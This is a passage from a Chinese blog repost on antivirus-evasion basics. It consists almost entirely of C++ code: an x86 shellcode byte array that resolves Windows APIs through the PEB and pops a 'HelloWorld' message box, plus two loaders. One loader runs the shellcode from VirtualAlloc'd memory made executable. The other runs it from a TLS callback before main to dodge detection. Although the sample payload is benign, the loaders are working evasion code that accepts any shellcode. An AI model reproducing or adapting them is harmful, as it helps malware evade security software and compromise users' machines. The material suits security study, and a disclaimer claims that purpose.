0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
PVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_protect = 0;
HANDLE h_thread;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
if (bRet != 0)
{
SHCreateThreadWithHandle(NULL, NULL, CTF_COINIT | CTF_PROCESS_REF, (LPTHREAD_START_ROUTINE)exec, &h_thread);
WaitForSingleObject(h_thread, -1);
}
// deallocate the space
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
tls-callback.cpp
// tls-callback.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <windows.h>
#include <iostream>
#include <string.h>
#include <stdint.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
VOID callback(PVOID handle, DWORD reason, PVOID reserved);
#ifdef _WIN64
#pragma comment(linker,"/INCLUDE:_tls_used")
#pragma comment(linker,"/INCLUDE:ptr_callback")
#pragma const_seg(push)
#pragma const_seg(".CRT$XLB")
EXTERN_C const PIMAGE_TLS_CALLBACK ptr_callback = callback;
#pragma const_seg(pop)
#else
#pragma comment(linker,"/INCLUDE:__tls_used")
#pragma comment(linker,"/INCLUDE:_ptr_callback")
#pragma data_seg(push)
#pragma data_seg(".CRT$XLB")
EXTERN_C PIMAGE_TLS_CALLBACK ptr_callback = (PIMAGE_TLS_CALLBACK)callback;
#pragma data_seg(pop)
#endif
int main()
{
std::cout << "Hello World!n";
}
VOID callback(PVOID handle, DWORD reason, PVOID reserved)
{
void* runtime;
DWORD old_protect = 0;
if (reason == DLL_PROCESS_ATTACH)
{
runtime = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(runtime, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
VirtualProtect(runtime, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READ, &old_protect);
int (*func)() = (int (*)())runtime;
func();
VirtualFree(runtime, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
}原文始发于微信公众号(loochSec):免杀学习-基础-一
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论